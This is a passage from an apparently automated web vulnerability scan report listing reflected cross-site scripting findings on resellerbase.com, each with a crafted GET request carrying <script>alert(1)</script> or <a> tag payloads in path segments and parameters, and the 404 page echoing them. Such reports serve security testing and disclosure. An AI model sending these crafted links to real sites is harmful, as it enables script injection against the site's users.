Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/search.phpd434b<script>alert(1)</script>48baec20360?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3336. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9db63<a>f85b132a3ce was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search9db63<a>f85b132a3ce&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search9db63<a>f85b132a3ce&opt=2 was not found on this server.</p>
...[SNIP]...

2.3337. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ef2be<a>e5c7d42dfda was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/search.php?keyword=search...ef2be<a>e5c7d42dfda&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/search.php?keyword=search...ef2be<a>e5c7d42dfda&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3338. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0d91<script>alert(1)</script>ff27fe332c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&e0d91<script>alert(1)</script>ff27fe332c6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&e0d91<script>alert(1)</script>ff27fe332c6=1 was not found on this server.</p>
...[SNIP]...

2.3339. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 58934<a>909195622ff was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=258934<a>909195622ff HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=258934<a>909195622ff was not found on this server.</p>
...[SNIP]...

2.3340. http://www.resellerbase.com/detail/46/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7cd23<script>alert(1)</script>e8f23ee4a6c was submitted in REST URL parameter 1 and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

Request

GET /detail7cd23<script>alert(1)</script>e8f23ee4a6c/46/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7cd23<script>alert(1)</script>e8f23ee4a6c/46/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3341. http://www.resellerbase.com/detail/46/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6045a<script>alert(1)</script>ec200d00e7c was submitted in REST URL parameter 2 and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

Request

GET /detail/466045a<script>alert(1)</script>ec200d00e7c/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/466045a<script>alert(1)</script>ec200d00e7c/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3342. http://www.resellerbase.com/detail/46/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d6be4<script>alert(1)</script>b36351f728f was submitted in REST URL parameter 3 and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

Request

GET /detail/46/themesd6be4<script>alert(1)</script>b36351f728f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themesd6be4<script>alert(1)</script>b36351f728f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3343. http://www.resellerbase.com/detail/46/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4298<script>alert(1)</script>a09214cee94 was submitted in REST URL parameter 4 (appended to the script name, before the query string) and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

Request

GET /detail/46/themes/search.phpe4298<script>alert(1)</script>a09214cee94?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/search.phpe4298<script>alert(1)</script>a09214cee94?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3344. http://www.resellerbase.com/detail/46/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ab348<a>bee214041f9 was submitted in the Submit3 parameter and was echoed unmodified in the application's response.

This shows that new HTML tags can be injected into the returned document. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it, so every path segment and query component of a request that reaches that handler lands in the same HTML text context. The scanner probed this parameter only with a bare <a> tag, which is why confidence is Firm rather than Certain; the same echo reflects <script>alert(1)</script> verbatim for the path segments and the arbitrary parameter name on this URL (neighbouring entries), so the lower confidence reflects the probe used, not a filter in front of Submit3. Confirm manually with a script payload in Submit3 before rating this finding differently from the others on this path.

Request

GET /detail/46/themes/search.php?keyword=search...&Submit3=Searchab348<a>bee214041f9&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/search.php?keyword=search...&Submit3=Searchab348<a>bee214041f9&opt=2 was not found on this server.</p>
...[SNIP]...

2.3345. http://www.resellerbase.com/detail/46/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload cc818<a>de71f8f5232 was submitted in the keyword parameter and was echoed unmodified in the application's response.

This shows that new HTML tags can be injected into the returned document. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it, so every path segment and query component of a request that reaches that handler lands in the same HTML text context. The scanner probed this parameter only with a bare <a> tag, which is why confidence is Firm rather than Certain; the same echo reflects <script>alert(1)</script> verbatim for the path segments and the arbitrary parameter name on this URL (neighbouring entries), so the lower confidence reflects the probe used, not a filter in front of keyword. Confirm manually with a script payload in keyword before rating this finding differently from the others on this path.

Request

GET /detail/46/themes/search.php?keyword=search...cc818<a>de71f8f5232&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/search.php?keyword=search...cc818<a>de71f8f5232&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3346. http://www.resellerbase.com/detail/46/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c6680<script>alert(1)</script>9710810aeee was submitted as the name of an added request parameter and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the query string itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

Request

GET /detail/46/themes/search.php?keyword=search...&Submit3=Search&opt=2&c6680<script>alert(1)</script>9710810aeee=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/search.php?keyword=search...&Submit3=Search&opt=2&c6680<script>alert(1)</script>9710810aeee=1 was not found on this server.</p>
...[SNIP]...

2.3347. http://www.resellerbase.com/detail/46/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8f36b<a>a81c6cb3d25 was submitted in the opt parameter and was echoed unmodified in the application's response.

This shows that new HTML tags can be injected into the returned document. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it, so every path segment and query component of a request that reaches that handler lands in the same HTML text context. The scanner probed this parameter only with a bare <a> tag, which is why confidence is Firm rather than Certain; the same echo reflects <script>alert(1)</script> verbatim for the path segments and the arbitrary parameter name on this URL (neighbouring entries), so the lower confidence reflects the probe used, not a filter in front of opt. Confirm manually with a script payload in opt before rating this finding differently from the others on this path.

Request

GET /detail/46/themes/search.php?keyword=search...&Submit3=Search&opt=28f36b<a>a81c6cb3d25 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/search.php?keyword=search...&Submit3=Search&opt=28f36b<a>a81c6cb3d25 was not found on this server.</p>
...[SNIP]...

2.3348. http://www.resellerbase.com/detail/5/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54d75<script>alert(1)</script>647f503fd4a was submitted in REST URL parameter 1 and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

Request

GET /detail54d75<script>alert(1)</script>647f503fd4a/5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail54d75<script>alert(1)</script>647f503fd4a/5/ was not found on this server.</p>
...[SNIP]...

2.3349. http://www.resellerbase.com/detail/5/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91400<script>alert(1)</script>aaa62ac48cd was submitted in REST URL parameter 2 and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

Request

GET /detail/591400<script>alert(1)</script>aaa62ac48cd/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/591400<script>alert(1)</script>aaa62ac48cd/ was not found on this server.</p>
...[SNIP]...

2.3350. http://www.resellerbase.com/detail/5/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5d2e2<script>alert(1)</script>5f1a239f1be was submitted as the name of an added request parameter and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the query string itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

Request

GET /detail/5/?5d2e2<script>alert(1)</script>5f1a239f1be=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/?5d2e2<script>alert(1)</script>5f1a239f1be=1 was not found on this server.</p>
...[SNIP]...

2.3351. http://www.resellerbase.com/detail/5/myresellerpanel-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/myresellerpanel-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c3973<script>alert(1)</script>4da4b5ab3f2 was submitted in REST URL parameter 1 and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

Request

GET /detailc3973<script>alert(1)</script>4da4b5ab3f2/5/myresellerpanel-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc3973<script>alert(1)</script>4da4b5ab3f2/5/myresellerpanel-com.html was not found on this server.</p>
...[SNIP]...

2.3352. http://www.resellerbase.com/detail/5/myresellerpanel-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/myresellerpanel-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 768bf<a>1c24e3b2db6 was submitted in REST URL parameter 2 and was echoed unmodified in the application's response.

